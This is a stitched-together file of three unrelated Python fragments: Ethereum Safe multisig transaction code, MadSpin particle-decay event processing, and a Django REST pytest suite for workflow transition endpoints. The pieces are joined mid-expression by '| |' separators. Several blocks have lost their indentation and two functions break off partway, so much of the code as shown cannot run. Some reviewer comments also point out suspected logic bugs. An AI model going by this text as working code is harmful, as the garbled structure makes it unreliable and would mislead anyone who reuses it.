        block_identifier: Optional[BlockIdentifier] = "latest",
        eip1559_speed: Optional[TxSpeed] = None,
    ) -> Tuple[HexBytes, TxParams]:
        """
        Send multisig tx to the Safe

        :param tx_sender_private_key: Sender private key
        :param tx_gas: Gas for the external tx. If not, `(safe_tx_gas + base_gas) * 2` will be used
        :param tx_gas_price: Gas price of the external tx. If not, `gas_price` will be used
        :param tx_nonce: Force nonce for `tx_sender`
        :param block_identifier: `latest` or `pending`
        :param eip1559_speed: If provided, use EIP1559 transaction
        :return: Tuple(tx_hash, tx)
        :raises: InvalidMultisigTx: If user tx cannot go through the Safe
        """
        sender_account = Account.from_key(tx_sender_private_key)
        if eip1559_speed and self.ethereum_client.is_eip1559_supported():
            tx_parameters = self.ethereum_client.set_eip1559_fees(
                {
                    "from": sender_account.address,
                },
                tx_speed=eip1559_speed,
            )
        else:
            # Legacy gas pricing: explicit override, the SafeTx gas price,
            # or the node's current gas price, in that order.
            tx_parameters = {
                "from": sender_account.address,
                "gasPrice": tx_gas_price or self.gas_price or self.w3.eth.gas_price,
            }
        if tx_gas:
            tx_parameters["gas"] = tx_gas
        if tx_nonce is not None:
            tx_parameters["nonce"] = tx_nonce
        self.tx = self.w3_tx.buildTransaction(tx_parameters)
        # Ensure the outer tx carries enough gas: either the forced value or
        # the estimate plus a 75k margin, floored by `recommended_gas`.
        self.tx["gas"] = Wei(
            tx_gas or (max(self.tx["gas"] + 75000, self.recommended_gas()))
        )
        self.tx_hash = self.ethereum_client.send_unsigned_transaction(
            self.tx,
            private_key=sender_account.key,
            retry=False if tx_nonce is not None else True,
            block_identifier=block_identifier,
        )
        # Set signatures empty after executing the tx. `Nonce` is increased even if it fails,
        # so signatures are not valid anymore
        self.signatures = b""
        return self.tx_hash, self.tx
def sign(self, private_key: str) -> bytes:
"""
{bytes32 r}{bytes32 s}{uint8 v}
:param private_key:
:return: Signature
"""
account = Account.from_key(private_key)
signature_dict = account.signHash(self.safe_tx_hash)
signature = signature_to_bytes(
signature_dict["v"], signature_dict["r"], signature_dict["s"]
)
# Insert signature sorted
if account.address | |
decay['decay_tag'],BWvalue))
if weight > 10.0 * decay['max_weight']:
error = """Found a weight MUCH larger than the computed max_weight (ratio: %s).
This usually means that the Narrow width approximation reaches it's limit on part of the Phase-Space.
Do not trust too much the tale of the distribution and/or relaunch the code with smaller BW_cut.
This is for channel %s with current BW_value at : %g'""" \
% (weight/decay['max_weight'], decay['decay_tag'], BWvalue)
logger.error(error)
elif report['over_weight'] > max(0.005*event_nb,3):
error = """Found too many weight larger than the computed max_weight (%s/%s = %s%%).
Please relaunch MS with more events/PS point by event in the
computation of the maximum_weight.
""" % (report['over_weight'], event_nb, 100 * report['over_weight']/event_nb )
raise MadSpinError(error)
error = True
elif report['%s_f' % (decay['decay_tag'],)] > max(0.01*report[decay['decay_tag']],3):
error = """Found too many weight larger than the computed max_weight (%s/%s = %s%%),
for channel %s. Please relaunch MS with more events/PS point by event in the
computation of the maximum_weight.
""" % (report['%s_f' % (decay['decay_tag'],)],\
report['%s' % (decay['decay_tag'],)],\
100 * report['%s_f' % (decay['decay_tag'],)] / report[ decay['decay_tag']] ,\
decay['decay_tag'])
raise MadSpinError(error)
decayed_event.change_wgt(factor= self.branching_ratio)
#decayed_event.wgt = decayed_event.wgt * self.branching_ratio
self.outputfile.write(decayed_event.string_event())
#print "number of trials: "+str(trial_nb)
trial_nb_all_events+=trial_nb
self.outputfile.write('</LesHouchesEvents>\n')
self.evtfile.close()
self.outputfile.close()
if report['over_weight'] > max(0.15*math.sqrt(event_nb),1):
error = """Found many weight larger than the computed max_weight (%s/%s = %s%%).
""" % (report['over_weight'], event_nb, 100 * report['over_weight']/event_nb )
logger.warning(error)
for decay_tag in self.all_decay.keys():
if report['%s_f' % (decay_tag,)] > max(0.2*report[decay_tag],1):
error = """Found many weight larger than the computed max_weight (%s/%s = %s%%),
for channel %s.""" % (report['%s_f' % (decay_tag,)],\
report['%s' % (decay_tag,)],\
100 * report['%s_f' % (decay_tag,)] / report[decay_tag] ,\
decay_tag)
logger.warning(error)
logger.info('Total number of events written: %s/%s ' % (event_nb, event_nb+nb_skip))
logger.info('Average number of trial points per production event: '\
+str(float(trial_nb_all_events)/float(event_nb)))
logger.info('Branching ratio to allowed decays: %g' % self.branching_ratio)
logger.info('Number of events with weights larger than max_weight: %s' % report['over_weight'])
logger.info('Number of subprocesses '+str(len(self.calculator)))
logger.info('Number of failures when restoring the Monte Carlo masses: %s ' % nb_fail_mc_mass)
if fail_nb:
logger.info('Number of failures in reshuffling (event skipped): %s ' % fail_nb)
return event_nb/(event_nb+nb_skip)
def adding_only_helicity(self, event_map, production_tag):
"""no decays for this production mode, run in passthrough mode,
only adding the helicities to the events """
#no decays for this production mode, run in passthrough mode, only adding the helicities to the events
nb_mc_masses=0
p, p_str=self.curr_event.give_momenta(event_map)
stdin_text=' %s %s %s %s \n' % ('2', self.options['BW_cut'], self.Ecollider, 1.0, self.options['frame_id'])
stdin_text+=p_str
# here I also need to specify the Monte Carlo Masses
stdin_text+=" %s \n" % nb_mc_masses
mepath = self.all_ME[production_tag]['path']
decay = self.all_ME[production_tag]['decays'][0]
decay_me=self.all_ME.get_decay_from_tag(production_tag, decay['decay_tag'])
mepath = decay_me['path']
output = self.loadfortran( 'unweighting', mepath, stdin_text)
if not output:
# Event fail
return 0, 1
trial_nb, BWvalue, weight, momenta, failed, use_mc_masses, helicities = output
self.reset_helicityonly_in_prod_event(event_map, helicities)
decayed_event = self.curr_event
self.outputfile.write(decayed_event.string_event())
#print "number of trials: "+str(trial_nb)
return trial_nb, 0
def get_int_mom_in_decay(self,decay_struct,ext_mom):
""" fill """
momenta_in_decay={}
for part in decay_struct.keys():
branch=decay_struct[part]['mg_tree']
nb_splitting=len(branch)
for split in range(nb_splitting-1,-1,-1):
mother=branch[split][0]
d1=branch[split][1]
d2=branch[split][2]
if d1>0:
momenta_in_decay[d1]=ext_mom[d1-1] # list_momenta is ordered according to ME
if d2>0:
momenta_in_decay[d2]=ext_mom[d2-1] # list_momenta is ordered according to ME
momenta_in_decay[mother]=momenta_in_decay[d1].add(momenta_in_decay[d2])
return momenta_in_decay
    def reset_mom_in_prod_event(self, decay_struct,prod2full, event_map, momenta_in_decay,ext_mom,use_mc_masses,helicities):
        """Reset the external momenta in the production event, since the
        virtuality of the decaying particles has slightly changed the
        kinematics.

        Decaying particles get the reconstructed resonance momentum; stable
        ones get the reshuffled external momentum and helicity, and their
        mass is restored either from the param_card or from the Monte Carlo
        masses depending on `use_mc_masses`.
        """
        for index in self.curr_event.event2mg.keys():
            # Only positive entries correspond to real external particles.
            if self.curr_event.event2mg[index]>0:
                part=self.curr_event.event2mg[index] # index for production ME
                part_for_curr_evt=event_map[part-1]+1 # index for curr event
                pid=self.curr_event.particle[part_for_curr_evt]['pid']
                if part in decay_struct:
                    # Decaying particle: use the momentum of its resonance
                    # (the first mother in the decay tree).
                    id_res=decay_struct[part]['mg_tree'][0][0]
                    self.curr_event.particle[part_for_curr_evt]['momentum']=momenta_in_decay[id_res].copy()
                    self.curr_event.particle[part_for_curr_evt]['mass']=self.curr_event.particle[part_for_curr_evt]['momentum'].m
                else:
                    # Stable particle: copy the reshuffled momentum/helicity.
                    self.curr_event.particle[part_for_curr_evt]['momentum']=ext_mom[prod2full[part-1]-1]
                    self.curr_event.particle[part_for_curr_evt]['helicity']=helicities[prod2full[part-1]-1]
                    if not use_mc_masses or abs(pid) not in self.MC_masses:
                        try:
                            self.curr_event.particle[part_for_curr_evt]['mass']=self.banner.get('param_card','mass', abs(pid)).value
                        except KeyError:
                            # Particles whose model mass is 'zero' have no
                            # param_card entry; anything else is a real error.
                            if self.model.get_particle(abs(pid)).get('mass').lower() == 'zero':
                                self.curr_event.particle[part_for_curr_evt]['mass'] = 0
                            else:
                                raise
                    else:
                        self.curr_event.particle[part_for_curr_evt]['mass']=self.MC_masses[abs(pid)]
    def reset_helicityonly_in_prod_event(self, event_map, helicities):
        """Reset only the helicities of the external particles in the
        production event (pass-through mode: momenta are left untouched).

        NOTE(review): the previous docstring was copy-pasted from
        reset_mom_in_prod_event and wrongly claimed momenta were reset.
        """
        for index in self.curr_event.event2mg.keys():
            # Only positive entries correspond to real external particles.
            if self.curr_event.event2mg[index]>0:
                part=self.curr_event.event2mg[index] # index for production ME
                part_for_curr_evt=event_map[part-1]+1 # index for curr event
                # NOTE(review): `pid` is computed but never used here.
                pid=self.curr_event.particle[part_for_curr_evt]['pid']
                self.curr_event.particle[part_for_curr_evt]['helicity']=helicities[part-1]
def get_mom(self,momenta):
    """Convert momenta from their string form into ``momentum`` objects.

    input: list of strings, each holding at least four whitespace-separated
    components (E, px, py, pz).
    output: list of ``momentum`` instances in the same order.
    """
    return [momentum(*(float(component) for component in line.split()[:4]))
            for line in momenta]
def get_identical_decay(self):
    """identify the various decay which are identical to each other"""
    logger.info('detect independant decays')
    start = time.time()
    # Possbilitiy to Bypass this step
    # Fast path: with a single decay every decay_tag maps onto the first
    # tag seen, with ratio 1 -- no matrix-element evaluation is needed.
    if len(self.all_decay) == 1:
        relation = {}
        base_tag = None
        for prod in self.all_ME.values():
            for decay in prod['decays']:
                tags = decay['decay_tag']
                for tag in tags:
                    if not base_tag:
                        relation[tag] = (tag, 1)
                        base_tag = tag
                    # NOTE(review): relation[base_tag] is the 2-tuple
                    # (base_tag, 1), so `(tag,1) not in relation[base_tag]`
                    # is a tuple-membership test that is always True;
                    # was `tag != base_tag` intended? Confirm.
                    elif (tag,1) not in relation[base_tag]:
                        relation[tag] = (base_tag,1)
        decay_mapping = self.get_process_identical_ratio(relation)
        return decay_mapping
    BW_cut = self.options['BW_cut']
    #class the decay by class (nbody/pid)
    # Key: (number of decay products, |pid| of decaying particle,
    # tuple of final-state masses). Decays in the same class are candidates
    # for being identical up to a constant ratio.
    nbody_to_decay = collections.defaultdict(list)
    for decay in self.all_decay.values():
        id = decay['dc_branch']['tree'][-1]['label']  # (shadows builtin `id`)
        id_final = decay['processes'][0].get_final_ids_after_decay()
        cut = 0.0
        mass_final = tuple([m if m> cut else 0 for m in map(self.pid2mass, id_final)])
        nbody_to_decay[(decay['nbody'], abs(id), mass_final)].append(decay)
    relation = {} # {tag: {(tag2, ratio)}}
    # Loop over the class and create the relation information about the 1
    for ((nbody, pid, finals),decays) in nbody_to_decay.items():
        if len(decays) == 1:
            continue
        # Decaying particle at rest with its pole mass.
        mom_init = momentum(self.pid2mass(pid), 0, 0, 0)
        # create an object for the validation, keeping the ratio between
        # MEM i and MEM j. this is set at zero when the ratio is not found
        #constant
        valid = dict([ ((i, j), True) for j in range(len(decays))
                       for i in range(len(decays))
                       if i != j])
        # Sample up to 125 phase-space points and compare the matrix
        # elements of all decays in the class pairwise.
        for nb in range(125):
            tree, jac, nb_sol = decays[0]['dc_branch'].generate_momenta(mom_init,\
                                True, self.pid2width, self.pid2mass, BW_cut,self.Ecollider)
            if not tree:
                continue
            p_str = '%s\n%s\n'% (tree[-1]['momentum'],
                       '\n'.join(str(tree[i]['momentum']) for i in range(1, len(tree))
                                 if i in tree))
            values = {}
            for i in range(len(decays)):
                if any([valid[(i,j)] for j in range(len(decays)) if i !=j]):
                    values[i] = self.calculate_matrix_element('decay',
                                               decays[i]['path'], p_str)
                else:
                    #skip computation if all possibility are ruled out.
                    values[i] = 0
            #check if the ratio is constant for all possibilities
            for i in range(len(decays)):
                for j in range(i+1, len(decays)):
                    if values[i] == 0 or values[j] == 0 or valid[(i,j)] == 0:
                        continue # already not valid
                    elif valid[(i,j)] is True:
                        # First sampled point: record the observed ratio.
                        valid[(i,j)] = values[j]/values[i]
                        valid[(j,i)] = valid[(i,j)]
                    # NOTE(review): no abs() around the difference, so a
                    # ratio drifting downwards always passes this tolerance
                    # test -- confirm whether abs() was intended.
                    elif (valid[(i,j)] - values[j]/values[i]) < 1e-6 * (valid[(i,j)] + values[j]/values[i]):
                        pass
                    else:
                        valid[(i, j)] = 0
                        valid[(j, i)] = 0
        if __debug__:
            # Dump the full ratio matrix for this class of decays.
            for i in range(len(decays)):
                comment= "| "
                for j in range(len(decays)):
                    if i == j:
                        comment+= "%4e " % 1
                        continue
                    comment+= "%4e " % valid[(i,j)]
                comment+= "|"+ os.path.basename(decays[i]['path'])
                logger.debug(comment)
        # store the result in the relation object. (using tag as key)
        for i in range(len(decays)):
            tag_i = decays[i]['tag'][2:]
            for j in range(i+1, len(decays)):
                tag_j = decays[j]['tag'][2:]
                if valid[(i,j)] and tag_j not in relation:
                    relation[tag_j] = (tag_i, valid[(i,j)])
    # fullfill the object with the already identify to one decay.
    #and add those who doesn't have any relations.
    for decay in self.all_decay.values():
        tags = [m.shell_string(pdg_order=True)[2:] for m in decay['processes']]
        init_tag = tags[0]
        if init_tag not in relation:
            out = (init_tag, 1)
        else:
            out = relation[init_tag]
        for tag in tags[1:]:
            relation[tag] = out
    decay_mapping = self.get_process_identical_ratio(relation)
    logger.info('Done in %ss' % (time.time()-start))
    return decay_mapping
def get_process_identical_ratio(self, relation):
# Now that we have ratio relation between each tag, we need to say
#what is the relation between the decay of the production process.
#This is not only the product since some decay can be equivalent.
decay_mapping = {} # final output: {first_process: [(equiv_proc, ratio), ...]
tag2real = {} # basic tag [the one related via relation] -> first process
# basic tag ratio doesn't have any identical factor (this simplify calculation)
nb=0
for prod in self.all_ME.values():
for decay in prod['decays']:
tag = decay['decay_tag']
nb+=1
# build the basic tag (all equiv process are related to this tag)
basic_tag = []
ratio = 1
for t in tag:
if | |
<gh_stars>0
from typing import Any, Dict, List, Optional, Tuple, cast
import uuid
from urllib.parse import quote
from django.contrib.auth.models import User
from processes.models import (
RunEnvironment, Workflow, WorkflowTransition, UserGroupAccessLevel
)
from processes.serializers import (
WorkflowTransitionSerializer
)
import pytest
from rest_framework.test import APIClient
from moto import mock_ecs, mock_sts, mock_events
from conftest import *
def ensure_serialized_workflow_transition_valid(response_workflow_transition: Dict[str, Any],
        workflow_transition: WorkflowTransition, user: User,
        group_access_level: int,
        api_key_access_level: Optional[int] = None,
        api_key_run_environment: Optional[RunEnvironment] = None) -> None:
    """Assert that a serialized WorkflowTransition in an API response matches
    what the serializer produces for the same authentication context.

    Also checks that, when the API key is scoped to a Run Environment, the
    transition's Workflow belongs to that Run Environment.
    """
    context = context_with_authenticated_request(user=user,
            group=workflow_transition.workflow.created_by_group,
            api_key_access_level=api_key_access_level,
            api_key_run_environment=api_key_run_environment)
    # Removed dead code: an effective access level was computed as
    # min(group_access_level, api_key_access_level) but never used.
    assert response_workflow_transition == WorkflowTransitionSerializer(
            workflow_transition, context=context).data
    if api_key_run_environment:
        assert api_key_run_environment.pk == workflow_transition.workflow.run_environment.pk
@pytest.mark.django_db
@pytest.mark.parametrize("""
  is_authenticated, group_access_level,
  api_key_access_level, api_key_scope_type,
  user_has_another_group, send_group_id_type, send_workflow_uuid_type,
  status_code, expected_indices
""", [
  # Admin with Admin API key, explicit group succeeds
  (True, UserGroupAccessLevel.ACCESS_LEVEL_ADMIN,
   UserGroupAccessLevel.ACCESS_LEVEL_ADMIN, None,
   False, SEND_ID_CORRECT, SEND_ID_NONE,
   200, [0, 1]),
  # Admin with Admin API key, no explicit group succeeds
  (True, UserGroupAccessLevel.ACCESS_LEVEL_ADMIN,
   UserGroupAccessLevel.ACCESS_LEVEL_ADMIN, None,
   False, SEND_ID_NONE, SEND_ID_NONE,
   200, [0, 1]),
  # Observer with JWT token, explicit group succeeds
  (True, UserGroupAccessLevel.ACCESS_LEVEL_OBSERVER,
   None, None,
   False, SEND_ID_CORRECT, SEND_ID_NONE,
   200, [0, 1]),
  # Observer in single group with JWT token, no explicit group succeeds
  (True, UserGroupAccessLevel.ACCESS_LEVEL_OBSERVER,
   None, None,
   False, SEND_ID_NONE, SEND_ID_NONE,
   200, [0, 1]),
  # Admin in multiple groups with JWT token, no explicit group yields 400
  (True, UserGroupAccessLevel.ACCESS_LEVEL_ADMIN,
   None, None,
   True, SEND_ID_NONE, SEND_ID_NONE,
   400, None),
  # Developer in multiple groups with JWT token, explicit group yields 200
  (True, UserGroupAccessLevel.ACCESS_LEVEL_DEVELOPER,
   None, None,
   True, SEND_ID_CORRECT, SEND_ID_NONE,
   200, [0, 1]),
  # Support user in multiple groups with JWT token, explicit Workflow yields 200
  (True, UserGroupAccessLevel.ACCESS_LEVEL_DEVELOPER,
   None, None,
   True, SEND_ID_NONE, SEND_ID_CORRECT,
   200, [0]),
  # Admin with Observer API key, explicit group succeeds
  (True, UserGroupAccessLevel.ACCESS_LEVEL_ADMIN,
   UserGroupAccessLevel.ACCESS_LEVEL_OBSERVER, None,
   False, SEND_ID_CORRECT, SEND_ID_NONE,
   200, [0, 1]),
  # Admin with multiple groups with Observer API key succeeds
  (True, UserGroupAccessLevel.ACCESS_LEVEL_OBSERVER,
   UserGroupAccessLevel.ACCESS_LEVEL_OBSERVER, None,
   True, SEND_ID_CORRECT, SEND_ID_NONE,
   200, [0, 1]),
  # No API key with no explicit group in request yields 400
  (True, UserGroupAccessLevel.ACCESS_LEVEL_OBSERVER,
   None, None,
   True, SEND_ID_NONE, SEND_ID_NONE,
   400, None),
  # API key with no explicit group in request succeeds
  (True, UserGroupAccessLevel.ACCESS_LEVEL_OBSERVER,
   UserGroupAccessLevel.ACCESS_LEVEL_OBSERVER, None,
   True, SEND_ID_NONE, SEND_ID_NONE,
   200, [0, 1]),
  # Admin with Admin API key, explicit wrong group yields 422
  (True, UserGroupAccessLevel.ACCESS_LEVEL_ADMIN,
   UserGroupAccessLevel.ACCESS_LEVEL_ADMIN, None,
   False, SEND_ID_WRONG, SEND_ID_NONE,
   422, None),
  # Admin using JWT, explicit wrong group yields 422
  (True, UserGroupAccessLevel.ACCESS_LEVEL_ADMIN,
   None, None,
   False, SEND_ID_WRONG, SEND_ID_NONE,
   422, None),
  # Admin using Admin API key, explicit bad group ID yields 422
  (True, UserGroupAccessLevel.ACCESS_LEVEL_ADMIN,
   UserGroupAccessLevel.ACCESS_LEVEL_ADMIN, None,
   False, SEND_ID_NOT_FOUND, SEND_ID_NONE,
   422, None),
  # Admin using JWT, explicit bad group ID yields 422
  (True, UserGroupAccessLevel.ACCESS_LEVEL_ADMIN,
   None, None,
   False, SEND_ID_NOT_FOUND, SEND_ID_NONE,
   422, None),
  # Admin with Admin API key scoped to correct Run Environment, explicit group finds the desired one
  (True, UserGroupAccessLevel.ACCESS_LEVEL_ADMIN,
   UserGroupAccessLevel.ACCESS_LEVEL_ADMIN, SCOPE_TYPE_CORRECT,
   False, SEND_ID_CORRECT, SEND_ID_NONE,
   200, [0]),
  # No authentication yields 401
  (False, UserGroupAccessLevel.ACCESS_LEVEL_ADMIN,
   None, None,
   False, SEND_ID_CORRECT, SEND_ID_NONE,
   401, None),
  # TODO: check filtering, non-default ordering
])
@mock_ecs
@mock_sts
@mock_events
def test_workflow_transition_list(
        is_authenticated: bool, group_access_level: Optional[int],
        api_key_access_level: Optional[int], api_key_scope_type: str,
        user_has_another_group: bool, send_group_id_type: str,
        send_workflow_uuid_type: str,
        status_code: int, expected_indices: List[int],
        user_factory, group_factory, run_environment_factory,
        workflow_factory, workflow_task_instance_factory, task_factory,
        workflow_transition_factory, api_client) -> None:
    """List endpoint test: builds two Workflows (production / test), each with
    a transition, then checks authorization, group/workflow filtering, and the
    serialized page contents against the parametrized expectations.
    """
    user = user_factory()
    group = user.groups.first()
    set_group_access_level(user=user, group=group,
            access_level=group_access_level)
    another_group = group_factory()
    if user_has_another_group:
        set_group_access_level(user=user, group=another_group,
                access_level=UserGroupAccessLevel.ACCESS_LEVEL_ADMIN)
    workflow_group = group
    # Fixture set 1: "production" Workflow with a from/to task-instance pair.
    production_run_environment = run_environment_factory(created_by_group=workflow_group)
    production_workflow = workflow_factory(created_by_group=workflow_group,
            run_environment=production_run_environment)
    production_from_wti = workflow_task_instance_factory(workflow=production_workflow,
            task=task_factory(run_environment=production_run_environment,
                    created_by_group=workflow_group))
    production_to_wti = workflow_task_instance_factory(workflow=production_workflow,
            task=task_factory(run_environment=production_run_environment,
                    created_by_group=workflow_group))
    # Fixture set 2: "test" Workflow with its own pair.
    test_run_environment = run_environment_factory(created_by_group=workflow_group)
    test_workflow = workflow_factory(created_by_group=workflow_group,
            run_environment=test_run_environment)
    test_from_wti = workflow_task_instance_factory(workflow=test_workflow,
            task=task_factory(run_environment=test_run_environment,
                    created_by_group=workflow_group))
    test_to_wti = workflow_task_instance_factory(workflow=test_workflow,
            task=task_factory(run_environment=test_run_environment,
                    created_by_group=workflow_group))
    # Sorted by UUID string so expected_indices refer to a deterministic
    # ordering, matching the API's default ordering.
    workflow_transitions = sorted([
        workflow_transition_factory(from_workflow_task_instance=test_from_wti,
                to_workflow_task_instance=test_to_wti),
        workflow_transition_factory(from_workflow_task_instance=production_from_wti,
                to_workflow_task_instance=production_to_wti),
    ], key=lambda wt: str(wt.uuid))
    api_key_run_environment = None
    if api_key_scope_type == SCOPE_TYPE_CORRECT:
        api_key_run_environment = workflow_transitions[0].to_workflow_task_instance.workflow.run_environment
    elif api_key_scope_type == SCOPE_TYPE_OTHER:
        api_key_run_environment = workflow_transitions[1].to_workflow_task_instance.workflow.run_environment
    client = make_api_client_from_options(api_client=api_client,
            is_authenticated=is_authenticated, user=user, group=group,
            api_key_access_level=api_key_access_level,
            api_key_run_environment=api_key_run_environment)
    params = {}
    group_id: Optional[str] = None
    if send_group_id_type == SEND_ID_CORRECT:
        group_id = str(group.id)
    elif send_group_id_type == SEND_ID_NOT_FOUND:
        group_id = '666'
    elif send_group_id_type == SEND_ID_WRONG:
        group_id = str(another_group.id)
    if group_id:
        params['workflow__created_by_group__id'] = group_id
    workflow_uuid: Optional[str] = None
    if send_workflow_uuid_type == SEND_ID_CORRECT:
        # NOTE(review): other code here reaches the Workflow via
        # to_workflow_task_instance.workflow -- confirm WorkflowTransition
        # exposes a direct `workflow` attribute/property.
        workflow_uuid = str(workflow_transitions[0].workflow.uuid)
    elif send_workflow_uuid_type == SEND_ID_NOT_FOUND:
        workflow_uuid = 'abc'
    if workflow_uuid:
        params['workflow__uuid'] = workflow_uuid
    response = client.get('/api/v1/workflow_transitions/', params)
    assert response.status_code == status_code
    if status_code == 200:
        assert group_access_level is not None
        page = response.data
        assert page['count'] == len(expected_indices)
        results = page['results']
        for i in expected_indices:
            response_workflow_transition = results[i]
            # NOTE(review): indexing results[i] while also using
            # expected_indices[i] as the target index only lines up when
            # expected_indices is a contiguous [0..k] prefix -- verify for
            # non-contiguous expectations.
            target_workflow_transition = workflow_transitions[expected_indices[i]]
            ensure_serialized_workflow_transition_valid(response_workflow_transition,
                    workflow_transition=target_workflow_transition, user=user,
                    group_access_level=group_access_level,
                    api_key_access_level=api_key_access_level,
                    api_key_run_environment=api_key_run_environment)
def common_setup(is_authenticated: bool, group_access_level: Optional[int],
        api_key_access_level: Optional[int], api_key_scope_type: str,
        uuid_send_type: str, existing_has_run_environment: bool,
        create_existing: bool,
        user, group_factory, run_environment_factory,
        workflow_factory, workflow_task_instance_factory, task_factory,
        workflow_transition_factory, api_client) \
        -> Tuple[Optional[WorkflowTransition], Workflow, Optional[RunEnvironment], APIClient, str]:
    """Shared setup for the single-object WorkflowTransition endpoint tests.

    Builds a Workflow (optionally with a Run Environment), optionally an
    existing WorkflowTransition on it, an API client authenticated per the
    given options, and the request URL (with or without a UUID path segment).

    Returns (existing transition or None, workflow, API-key Run Environment
    or None, client, url).
    """
    group = user.groups.first()
    if group_access_level is not None:
        set_group_access_level(user=user, group=group,
                access_level=group_access_level)
    workflow_transition_group = group
    workflow_run_environment = None
    if existing_has_run_environment:
        workflow_run_environment = run_environment_factory(
                created_by_group=workflow_transition_group)
    # A second Run Environment used for SCOPE_TYPE_OTHER scoping cases.
    another_run_environment = run_environment_factory(created_by_group=workflow_transition_group)
    workflow = workflow_factory(created_by_group=group, run_environment=workflow_run_environment)
    from_wti = workflow_task_instance_factory(workflow=workflow)
    to_wti = workflow_task_instance_factory(workflow=workflow)
    workflow_transition: Optional[WorkflowTransition] = None
    if create_existing:
        workflow_transition = workflow_transition_factory(
                from_workflow_task_instance=from_wti,
                to_workflow_task_instance=to_wti)
    api_key_run_environment = None
    if api_key_scope_type == SCOPE_TYPE_CORRECT:
        api_key_run_environment = workflow_run_environment
    elif api_key_scope_type == SCOPE_TYPE_OTHER:
        api_key_run_environment = another_run_environment
    client = make_api_client_from_options(api_client=api_client,
            is_authenticated=is_authenticated, user=user, group=group,
            api_key_access_level=api_key_access_level,
            api_key_run_environment=api_key_run_environment)
    url = '/api/v1/workflow_transitions/'
    if uuid_send_type != SEND_ID_NONE:
        # Default to a random UUID (the not-found case); specific send types
        # override it below.
        workflow_transition_uuid = uuid.uuid4()
        if uuid_send_type == SEND_ID_CORRECT:
            workflow_transition_uuid = cast(WorkflowTransition, workflow_transition).uuid
        elif uuid_send_type == SEND_ID_IN_WRONG_GROUP:
            # Build a full transition in a *different* group the user
            # administers, to check cross-group isolation.
            another_group = group_factory()
            set_group_access_level(user=user, group=another_group,
                    access_level=UserGroupAccessLevel.ACCESS_LEVEL_ADMIN)
            workflow_in_other_group = workflow_factory(created_by_group=another_group)
            from_wti_in_other_group = workflow_task_instance_factory(
                    workflow=workflow_in_other_group,
                    task=task_factory(created_by_group=another_group))
            to_wti_in_other_group = workflow_task_instance_factory(
                    workflow=workflow_in_other_group,
                    task=task_factory(created_by_group=another_group))
            workflow_transition_in_other_group = workflow_transition_factory(
                    from_workflow_task_instance=from_wti_in_other_group,
                    to_workflow_task_instance=to_wti_in_other_group)
            workflow_transition_uuid = workflow_transition_in_other_group.uuid
        url += quote(str(workflow_transition_uuid)) + '/'
    return (workflow_transition, workflow, api_key_run_environment, client, url)
def make_request_body(uuid_send_type: Optional[str],
        wti_send_type: Optional[str],
        for_from_wti: bool,
        user: User,
        api_key_run_environment: Optional[RunEnvironment],
        workflow_transition: Optional[WorkflowTransition],
        workflow: Workflow,
        group_factory, run_environment_factory, workflow_factory,
        workflow_task_instance_factory, task_factory,
        workflow_transition_factory) -> Dict[str, Any]:
    """Build a request body for creating/updating a WorkflowTransition.

    One side of the transition (the "good" side) always points at a freshly
    created Workflow Task Instance in the given Workflow; the other
    ("varying") side is controlled by wti_send_type to exercise the various
    validation cases (missing, wrong group, other Run Environment, ...).
    for_from_wti selects which side is the varying one.
    """
    request_data: Dict[str, Any] = {
      'rule_type': WorkflowTransition.RULE_TYPE_ON_SUCCESS
    }
    if uuid_send_type == SEND_ID_NOT_FOUND:
        request_data['uuid'] = str(uuid.uuid4())
    elif uuid_send_type == SEND_ID_CORRECT:
        request_data['uuid'] = str(cast(WorkflowTransition, workflow_transition).uuid)
    elif uuid_send_type == SEND_ID_WRONG:
        another_workflow_transition = workflow_transition_factory()
        request_data['uuid'] = str(another_workflow_transition.uuid)
    good_wti_prefix = 'to' if for_from_wti else 'from'
    varying_wti_prefix = 'from' if for_from_wti else 'to'
    varying_task_run_environment: Optional[RunEnvironment] = None
    workflow_run_environment = workflow.run_environment
    varying_task_run_environment = workflow_run_environment
    group = workflow.created_by_group
    # The "good" side always lives in the target Workflow.
    good_task = task_factory(
            created_by_group=group,
            run_environment=varying_task_run_environment)
    good_wti = workflow_task_instance_factory(workflow=workflow,
            task=good_task)
    request_data[f'{good_wti_prefix}_workflow_task_instance'] = {
        'uuid': str(good_wti.uuid)
    }
    # wti_send_type is None => omit the varying side from the body entirely.
    if wti_send_type is not None:
        if wti_send_type == SEND_ID_NONE:
            request_data[f'{varying_wti_prefix}_workflow_task_instance'] = None
        else:
            if wti_send_type == SEND_ID_CORRECT:
                if api_key_run_environment:
                    workflow_run_environment = api_key_run_environment
            elif wti_send_type == SEND_ID_WRONG:
                workflow = workflow_factory()
            elif wti_send_type == SEND_ID_WITH_OTHER_RUN_ENVIRONMENT:
                workflow_run_environment = run_environment_factory(created_by_group=user.groups.first())
                workflow = workflow_factory(run_environment=workflow_run_environment,
                        created_by_group=group)
            elif wti_send_type == SEND_ID_IN_WRONG_GROUP:
                group = group_factory()
                set_group_access_level(user=user, group=group,
                        access_level=UserGroupAccessLevel.ACCESS_LEVEL_ADMIN)
                workflow_run_environment = run_environment_factory(created_by_group=group)
                workflow = workflow_factory(run_environment=workflow_run_environment,
                        created_by_group=group)
            varying_task_group = group
            varying_task_run_environment = workflow_run_environment or \
                    run_environment_factory(created_by_group=varying_task_group)
            varying_task = task_factory(
                    created_by_group=varying_task_run_environment.created_by_group,
                    run_environment=varying_task_run_environment)
    if wti_send_type and (wti_send_type != SEND_ID_NONE):
        varying_wti = workflow_task_instance_factory(workflow=workflow, task=varying_task)
        request_data[f'{varying_wti_prefix}_workflow_task_instance'] = {
            'uuid': str(varying_wti.uuid)
        }
    # Removed leftover debug print of request_data.
    return request_data
@pytest.mark.django_db
@pytest.mark.parametrize("""
is_authenticated, group_access_level,
api_key_access_level, api_key_scope_type,
uuid_send_type,
status_code
""", [
# Admin with API Key succeeds
(True, UserGroupAccessLevel.ACCESS_LEVEL_ADMIN,
UserGroupAccessLevel.ACCESS_LEVEL_ADMIN, SCOPE_TYPE_NONE,
SEND_ID_CORRECT,
200),
# Developer with API Key succeeds
(True, UserGroupAccessLevel.ACCESS_LEVEL_DEVELOPER,
UserGroupAccessLevel.ACCESS_LEVEL_DEVELOPER, SCOPE_TYPE_NONE,
SEND_ID_CORRECT,
200),
# Developer with API Key succeeds with unscoped Alert Method
(True, UserGroupAccessLevel.ACCESS_LEVEL_DEVELOPER,
UserGroupAccessLevel.ACCESS_LEVEL_DEVELOPER, SCOPE_TYPE_NONE,
SEND_ID_CORRECT,
200),
# Observer with API Key succeeds
